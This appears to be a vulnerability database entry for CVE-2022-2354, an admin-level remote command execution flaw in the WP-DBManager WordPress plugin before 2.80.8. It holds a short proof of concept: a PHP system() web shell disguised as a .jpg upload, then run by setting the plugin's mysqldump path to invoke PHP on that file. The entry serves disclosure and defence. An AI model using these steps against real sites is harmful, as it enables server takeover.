Lucene search
Raad Haddad of Cloudyrion GmbHWPEX-ID:1C8C5861-CE87-4813-9E26-470D63C1903AHistoryJul 25, 2022 - 12:00 a.m.
WP-DBManager < 2.80.8 - Admin+ Remote Command Execution
2022-07-2500:00:00
Raad Haddad of Cloudyrion GmbH
99
0.001 Low
EPSS
Percentile
43.1%
The plugin does not prevent administrators from running arbitrary commands on the server in multisite installations, where only super-administrators should.
# Use any WordPress plugin that allows the users to upload files with extension - ".php" is not required - for example: .jpg (usually many plugins allows such extensions)
# Upload your malicious file, for example: test_rce.jpg with the following content:
<?php system("COMMAND"); ?>
# Go to "DB Options" under WP-DBManager plugin
# Define the below payload as "Path To mysqldump" parameter's value:
/usr/bin/php /var/www/blog/test_rce.jpg
# Go to "Backup DB" and click on "Backup" button
# Command will get executed without any issuesRelated
nvd
nvd
CVE-2022-2354
2022-08-15 11:21:22
wpvulndb
wpvulndb
WP-DBManager < 2.80.8 - Admin+ Remote Command Execution
2022-07-25 00:00:00
prion
prion
Code injection
2022-08-15 11:21:00
cvelist
cvelist
CVE-2022-2354 WP-DBManager < 2.80.8 - Admin+ Remote Command Execution
2022-08-15 08:36:54
cve
cve
CVE-2022-2354
2022-08-15 11:21:22
patchstack
patchstack